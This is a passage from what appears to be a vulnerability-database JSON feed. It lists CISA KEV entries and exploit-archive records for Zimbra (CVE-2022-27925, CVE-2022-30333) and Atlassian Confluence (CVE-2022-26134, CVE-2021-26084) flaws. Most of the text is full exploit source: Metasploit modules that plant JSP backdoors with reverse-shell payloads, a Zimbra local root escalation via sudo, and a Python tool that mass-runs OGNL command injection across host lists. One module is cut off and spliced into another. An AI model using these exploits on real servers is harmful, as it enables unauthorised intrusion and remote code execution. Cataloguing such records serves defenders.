"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333"], "modified": "2022-08-09T00:00:00", "id": "CISA-KEV-CVE-2022-30333", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-06T15:41:25", "description": "Atlassian Confluence Server and Data Center contain a remote code execution vulnerability that allows for an unauthenticated attacker to perform remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T00:00:00", "type": "cisa_kev", "title": "Atlassian Confluence Server and Data Center Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-02T00:00:00", "id": "CISA-KEV-CVE-2022-26134", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2022-08-24T13:30:03", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", 
"attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-24T00:00:00", "type": "packetstorm", "title": "Zimbra Zip Path Traversal", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925", "CVE-2022-37042"], "modified": "2022-08-24T00:00:00", "id": "PACKETSTORM:168146", "href": "https://packetstormsecurity.com/files/168146/Zimbra-Zip-Path-Traversal.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'rex/zip' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Zip Path Traversal in Zimbra (mboximport) (CVE-2022-27925)', \n'Description' => %q{ \nThis module POSTs a ZIP file containing path traversal characters to \nthe administrator interface for Zimbra Collaboration Suite. If \nsuccessful, it plants a JSP-based backdoor within the web directory, then \nexecutes it. 
\n \nThe core vulnerability is a path-traversal issue in Zimbra Collaboration Suite's \nZIP implementation that can result in the extraction of an arbitrary file \nto an arbitrary location on the host. \n \nThis issue is exploitable on the following versions of Zimbra: \n \n* Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (and earlier) \n* Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (and earlier) \n \nNote that the Open Source Edition is not affected. \n}, \n'Author' => [ \n'Volexity Threat Research', # Initial writeup \n\"Yang_99's Nest\", # PoC \n'Ron Bowes', # Analysis / module \n], \n'License' => MSF_LICENSE, \n'References' => [ \n['CVE', '2022-27925'], \n['CVE', '2022-37042'], \n['URL', 'https://blog.zimbra.com/2022/03/new-zimbra-patches-9-0-0-patch-24-and-8-8-15-patch-31/'], \n['URL', 'https://www.cisa.gov/uscert/ncas/alerts/aa22-228a'], \n['URL', 'https://www.yang99.top/index.php/archives/82/'], \n['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P24'], \n['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P31'], \n], \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Targets' => [ \n[ 'Zimbra Collaboration Suite', {} ] \n], \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', \n'TARGET_PATH' => '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbraAdmin/public/', \n'TARGET_FILENAME' => nil, \n'RPORT' => 7071, \n'SSL' => true \n}, \n'DefaultTarget' => 0, \n'Privileged' => false, \n'DisclosureDate' => '2022-05-10', \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS] \n} \n) \n) \n \nregister_options( \n[ \nOptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - \"../../\").']), \nOptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: 
\"modulepath #{exploit_dir}\\nmoduleload #{library_name}\\n\"\n write_file(config_path, config)\n\n write_file(library_path, generate_payload_dll)\n\n cmd = \"sudo #{datastore['ZIMBRA_BASE']}/libexec/zmslapd -u root -g root -f #{config_path}\"\n print_status \"Attempting to trigger payload: #{cmd}\"\n out = cmd_exec(cmd)\n\n unless session_created?\n print_error(\"Failed to create session! Cmd output = #{out}\")\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/37907", "cvss": {"score": 4.3, "vector": "AV:L/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T15:00:33", "description": "This Metasploit module creates a RAR file that can be emailed to a Zimbra server to exploit CVE-2022-30333. If successful, it plants a JSP-based backdoor in the public web directory, then executes that backdoor. The core vulnerability is a path-traversal issue in unRAR that can extract an arbitrary file to an arbitrary location on a Linux system. This issue is exploitable on Zimbra Collaboration versions 9.0.0 Patch 24 and below and 8.8.15 Patch 31 and below provided that UnRAR versions 6.11 or below are installed.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-07T00:00:00", "type": "zdt", "title": "Zimbra UnRAR Path Traversal Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": 
"AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333"], "modified": "2022-08-07T00:00:00", "id": "1337DAY-ID-37894", "href": "https://0day.today/exploit/description/37894", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::EXE\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Format::RarSymlinkPathTraversal\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'UnRAR Path Traversal in Zimbra (CVE-2022-30333)',\n 'Description' => %q{\n This module creates a RAR file that can be emailed to a Zimbra server\n to exploit CVE-2022-30333. 
If successful, it plants a JSP-based\n backdoor in the public web directory, then executes that backdoor.\n\n The core vulnerability is a path-traversal issue in unRAR that can\n extract an arbitrary file to an arbitrary location on a Linux system.\n\n This issue is exploitable on the following versions of Zimbra, provided\n UnRAR version 6.11 or earlier is installed:\n\n * Zimbra Collaboration 9.0.0 Patch 24 (and earlier)\n * Zimbra Collaboration 8.8.15 Patch 31 (and earlier)\n },\n 'Author' => [\n 'Simon Scannell', # Discovery / initial disclosure (via Sonar)\n 'Ron Bowes', # Analysis, PoC, and module\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2022-30333'],\n ['URL', 'https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/'],\n ['URL', 'https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946'],\n ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P25'],\n ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P32'],\n ['URL', 'https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis'],\n ],\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [\n [ 'Zimbra Collaboration Suite', {} ]\n ],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',\n 'TARGET_PATH' => '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/',\n 'TARGET_FILENAME' => nil,\n 'DisablePayloadHandler' => false,\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Stance' => Msf::Exploit::Stance::Passive,\n 'DefaultTarget' => 0,\n 'Privileged' => false,\n 'DisclosureDate' => '2022-06-28',\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n\n register_options(\n [\n OptString.new('FILENAME', [ false, 'The file name.', 'payload.rar']),\n\n # Separating the path, filename, and extension allows us to randomize the filename\n OptString.new('TARGET_PATH', [ true, 'The location 
the payload should extract to (can, and should, contain path traversal characters - \"../../\").']),\n OptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).']),\n ]\n )\n\n register_advanced_options(\n [\n OptString.new('SYMLINK_FILENAME', [ false, 'The name of the symlink file to use (must be 12 characters or less; default: random)']),\n OptBool.new('TRIGGER_PAYLOAD', [ false, 'If set, attempt to trigger the payload via an HTTP request.', true ]),\n\n # Took this from multi/handler\n OptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions.', 0 ]),\n OptInt.new('CheckInterval', [ true, 'The number of seconds to wait between each attempt to trigger the payload on the server.', 5 ])\n ]\n )\n end\n\n # Generate an on-system filename using datastore options\n def generate_target_filename\n if datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp')\n print_Warning('TARGET_FILENAME does not end with .jsp, was that intentional?')\n end\n\n File.join(datastore['TARGET_PATH'], datastore['TARGET_FILENAME'] || \"#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp\")\n end\n\n # Normalize the path traversal and figure out where it is relative to the web root\n def zimbra_get_public_path(target_filename)\n # Normalize the path\n normalized_path = Pathname.new(File.join('/opt/zimbra/data/amavisd/tmp', target_filename)).cleanpath\n\n # Figure out where it is, relative to the webroot\n webroot = Pathname.new('/opt/zimbra/jetty_base/webapps/zimbra/')\n relative_path = normalized_path.relative_path_from(webroot)\n\n # Hopefully, we found a path from the webroot to the payload!\n if relative_path.to_s.start_with?('../')\n return nil\n end\n\n relative_path\n end\n\n def exploit\n print_status('Encoding the payload as a .jsp file')\n payload = Msf::Util::EXE.to_jsp(generate_payload_exe)\n\n # Create a file\n target_filename = 
generate_target_filename\n print_status(\"Target filename: #{target_filename}\")\n\n begin\n rar = encode_as_traversal_rar(datastore['SYMLINK_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..12), target_filename, payload)\n rescue StandardError => e\n fail_with(Failure::BadConfig, \"Failed to encode RAR file: #{e}\")\n end\n\n file_create(rar)\n\n print_good('File created! Email the file above to any user on the target Zimbra server')\n\n # Bail if they don't want the payload triggered\n return unless datastore['TRIGGER_PAYLOAD']\n\n # Get the public path for triggering the vulnerability, terminate if we\n # can't figure it out\n public_filename = zimbra_get_public_path(target_filename)\n if public_filename.nil?\n print_warning('Could not determine the public web path, disabling payload triggering')\n return\n end\n\n register_file_for_cleanup(target_filename)\n\n interval = datastore['CheckInterval'].to_i\n print_status(\"Trying to trigger the backdoor @ #{public_filename} every #{interval}s [backgrounding]...\")\n\n # This loop is mostly from `multi/handler`\n stime = Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i\n timeout = datastore['ListenerTimeout'].to_i\n loop do\n break if session_created?\n break if timeout > 0 && (stime + timeout < Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i)\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(public_filename)\n )\n\n unless res\n fail_with(Failure::Unknown, 'Could not connect to the server to trigger the payload')\n end\n\n Rex::ThreadSafe.sleep(interval)\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/37894", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-06T18:53:25", "description": "Confluence suffers from a pre-authentication remote code execution vulnerability that is leveraged via OGNL injection. 
All 7.4.17 versions before 7.18.1 are affected.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T00:00:00", "type": "zdt", "title": "Confluence OGNL Injection Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T00:00:00", "id": "1337DAY-ID-37778", "href": "https://0day.today/exploit/description/37778", "sourceData": "#!/usr/bin/python3\n\n# Exploit Title: Confluence Pre-Auth Remote Code Execution via OGNL Injection\n# Google Dork: N/A\n# Date: 06/006/2022\n# Exploit Author: h3v0x\n# Vendor Homepage: https://www.atlassian.com/\n# Software Link: https://www.atlassian.com/software/confluence/download-archives\n# Version: All < 7.4.17 versions before 7.18.1\n# Tested on: -\n# CVE : CVE-2022-26134\n# https://github.com/h3v0x/CVE-2022-26134\n\nimport sys\nimport requests\nimport optparse\nimport multiprocessing\n\nfrom requests.packages import urllib3\nfrom requests.exceptions import MissingSchema, InvalidURL\nurllib3.disable_warnings()\n\nrequestEngine = multiprocessing.Manager()\nsession = requests.Session()\n\nglobal 
paramResults\nparamResults = requestEngine.list()\nglobals().update(locals())\n\ndef spiderXpl(url):\n globals().update(locals())\n if not url.startswith('http'):\n url='http://'+url\n \n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\",\n \"Connection\": \"close\",\n \"Accept-Encoding\": \"gzip, deflate\"}\n\n try:\n response = requests.get(url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22'+optionsOpt.command+'%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/', headers=headers, verify=False, allow_redirects=False)\n if(response.status_code == 302):\n print('Found: '+url+' // '+ response.headers['X-Cmd-Response'])\n\n inputBuffer = str(response.headers['X-Cmd-Response'])\n paramResults.append('Vulnerable application found:'+url+'\\n''Command result:'+inputBuffer+'\\n')\n else:\n pass\n\n except requests.exceptions.ConnectionError:\n print('[x] Failed to Connect: '+url)\n pass\n except multiprocessing.log_to_stderr:\n pass\n except KeyboardInterrupt:\n print('[!] Stoping exploit...')\n exit(0)\n except (MissingSchema, InvalidURL):\n pass\n \n \ndef banner():\n print('[-] CVE-2022-26134')\n print('[-] Confluence Pre-Auth Remote Code Execution via OGNL Injection \\n')\n\n \ndef main():\n banner()\n \n globals().update(locals())\n \n sys.setrecursionlimit(100000)\n\n if not optionsOpt.filehosts:\n url = optionsOpt.url\n spiderXpl(url)\n else:\n f = open(optionsOpt.filehosts)\n urls = map(str.strip, f.readlines())\n\n multiReq = multiprocessing.Pool(optionsOpt.threads_set)\n try:\n multiReq.map(spiderXpl, urls)\n multiReq.close()\n multiReq.join()\n except UnboundLocalError:\n pass\n except KeyboardInterrupt:\n exit(0)\n\n\n if optionsOpt.output:\n print(\"\\n[!] 
Saving the output result in: %s\" % optionsOpt.output)\n\n with open(optionsOpt.output, \"w\") as f:\n for result in paramResults:\n f.write(\"%s\\n\" % result)\n f.close()\n\nif __name__ == \"__main__\":\n parser = optparse.OptionParser()\n\n parser.add_option('-u', '--url', action=\"store\", dest=\"url\", help='Base target uri (ex. http://target-uri/)')\n parser.add_option('-f', '--file', dest=\"filehosts\", help='example.txt')\n parser.add_option('-t', '--threads', dest=\"threads_set\", type=int,default=10)\n parser.add_option('-m', '--maxtimeout', dest=\"timeout\", type=int,default=8)\n parser.add_option('-o', '--output', dest=\"output\", type=str, default='exploit_result.txt')\n parser.add_option('-c', '--cmd', dest=\"command\", type=str, default='id')\n optionsOpt, args = parser.parse_args()\n\n main()\n", "sourceHref": "https://0day.today/exploit/37778", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-21T14:42:31", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-10T00:00:00", "type": "zdt", "title": "Confluence Data Center 7.18.0 - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-10T00:00:00", "id": "1337DAY-ID-37783", "href": "https://0day.today/exploit/description/37783", "sourceData": "# Exploit Title: Confluence Data Center 7.18.0 - Remote Code Execution (RCE)\n# Exploit Author: h3v0x\n# Vendor Homepage: https://www.atlassian.com/\n# Software Link: https://www.atlassian.com/software/confluence/download-archives\n# Version: All < 7.4.17 versions before 7.18.1\n# Tested on: -\n# CVE : CVE-2022-26134\n# https://github.com/h3v0x/CVE-2022-26134\n\n#!/usr/bin/python3\n\nimport sys\nimport requests\nimport optparse\nimport multiprocessing\n\nfrom requests.packages import urllib3\nfrom requests.exceptions import MissingSchema, InvalidURL\nurllib3.disable_warnings()\n\nrequestEngine = multiprocessing.Manager()\nsession = requests.Session()\n\nglobal paramResults\nparamResults = requestEngine.list()\nglobals().update(locals())\n\ndef spiderXpl(url):\n globals().update(locals())\n if not url.startswith('http'):\n url='http://'+url\n \n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\",\n \"Connection\": \"close\",\n \"Accept-Encoding\": \"gzip, deflate\"}\n\n try:\n response = requests.get(url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22'+optionsOpt.command+'%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/', headers=headers, verify=False, allow_redirects=False)\n if(response.status_code == 302):\n print('Found: '+url+' // '+ response.headers['X-Cmd-Response'])\n\n inputBuffer = str(response.headers['X-Cmd-Response'])\n paramResults.append('Vulnerable application found:'+url+'\\n''Command result:'+inputBuffer+'\\n')\n else:\n pass\n\n except 
requests.exceptions.ConnectionError:\n print('[x] Failed to Connect: '+url)\n pass\n except multiprocessing.log_to_stderr:\n pass\n except KeyboardInterrupt:\n print('[!] Stoping exploit...')\n exit(0)\n except (MissingSchema, InvalidURL):\n pass\n \n \ndef banner():\n print('[-] CVE-2022-26134')\n print('[-] Confluence Pre-Auth Remote Code Execution via OGNL Injection \\n')\n\n \ndef main():\n banner()\n \n globals().update(locals())\n \n sys.setrecursionlimit(100000)\n\n if not optionsOpt.filehosts:\n url = optionsOpt.url\n spiderXpl(url)\n else:\n f = open(optionsOpt.filehosts)\n urls = map(str.strip, f.readlines())\n\n multiReq = multiprocessing.Pool(optionsOpt.threads_set)\n try:\n multiReq.map(spiderXpl, urls)\n multiReq.close()\n multiReq.join()\n except UnboundLocalError:\n pass\n except KeyboardInterrupt:\n exit(0)\n\n\n if optionsOpt.output:\n print(\"\\n[!] Saving the output result in: %s\" % optionsOpt.output)\n\n with open(optionsOpt.output, \"w\") as f:\n for result in paramResults:\n f.write(\"%s\\n\" % result)\n f.close()\n\nif __name__ == \"__main__\":\n parser = optparse.OptionParser()\n\n parser.add_option('-u', '--url', action=\"store\", dest=\"url\", help='Base target uri (ex. http://target-uri/)')\n parser.add_option('-f', '--file', dest=\"filehosts\", help='example.txt')\n parser.add_option('-t', '--threads', dest=\"threads_set\", type=int,default=10)\n parser.add_option('-m', '--maxtimeout', dest=\"timeout\", type=int,default=8)\n parser.add_option('-o', '--output', dest=\"output\", type=str, default='exploit_result.txt')\n parser.add_option('-c', '--cmd', dest=\"command\", type=str, default='id')\n optionsOpt, args = parser.parse_args()\n\n main()\n", "sourceHref": "https://0day.today/exploit/37783", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T18:53:25", "description": "This Metasploit module exploits an OGNL injection in Atlassian Confluence servers. 
A specially crafted URI can be used to evaluate an OGNL expression resulting in OS command execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-09T00:00:00", "type": "zdt", "title": "Atlassian Confluence Namespace OGNL Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2022-26134"], "modified": "2022-06-09T00:00:00", "id": "1337DAY-ID-37781", "href": "https://0day.today/exploit/description/37781", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Atlassian Confluence Namespace OGNL Injection',\n 'Description' => %q{\n This module exploits an OGNL injection in Atlassian Confluence servers. 
A specially crafted URI can be used to\n evaluate an OGNL expression resulting in OS command execution.\n },\n 'Author' => [\n 'Unknown', # exploited in the wild\n 'bturner-r7',\n 'jbaines-r7',\n 'Spencer McIntyre'\n ],\n 'References' => [\n ['CVE', '2021-26084'],\n ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro'],\n ['URL', 'https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py'],\n ['URL', 'https://github.com/jbaines-r7/through_the_wire'],\n ['URL', 'https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis']\n ],\n 'DisclosureDate' => '2022-06-02',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 8090\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n version = get_confluence_version\n return CheckCode::Unknown unless version\n\n vprint_status(\"Detected Confluence version: #{version}\")\n header = \"X-#{Rex::Text.rand_text_alphanumeric(10..15)}\"\n res = inject_ognl('', header: header) # empty command works for testing, the header will be set\n\n return CheckCode::Unknown unless res\n\n unless res && res.headers.include?(header)\n return CheckCode::Safe('Failed to test OGNL injection.')\n end\n\n CheckCode::Vulnerable('Successfully tested OGNL injection.')\n end\n\n def get_confluence_version\n return @confluence_version if @confluence_version\n\n res = 
send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'login.action')\n )\n return nil unless res&.code == 200\n\n poweredby = res.get_xml_document.xpath('//ul[@id=\"poweredby\"]/li[@class=\"print-only\"]/text()').first&.text\n return nil unless poweredby =~ /Confluence (\\d+(\\.\\d+)*)/\n\n @confluence_version = Rex::Version.new(Regexp.last_match(1))\n @confluence_version\n end\n\n def exploit\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :cmd\n execute_command(payload.encoded)\n when :dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n header = \"X-#{Rex::Text.rand_text_alphanumeric(10..15)}\"\n res = inject_ognl(cmd, header: header)\n\n unless res && res.headers.include?(header)\n fail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\")\n end\n\n vprint_good(\"Successfully executed command: #{cmd}\")\n res.headers[header]\n end\n\n def inject_ognl(cmd, header:)\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, Rex::Text.uri_encode(ognl_payload(cmd, header: header)), 'dashboard.action'),\n 'headers' => { header => cmd }\n )\n end\n\n def ognl_payload(_cmd, header:)\n <<~OGNL.gsub(/^\\s+/, '').tr(\"\\n\", '')\n ${\n Class.forName(\"com.opensymphony.webwork.ServletActionContext\")\n .getMethod(\"getResponse\",null)\n .invoke(null,null)\n .setHeader(\"#{header}\",\n 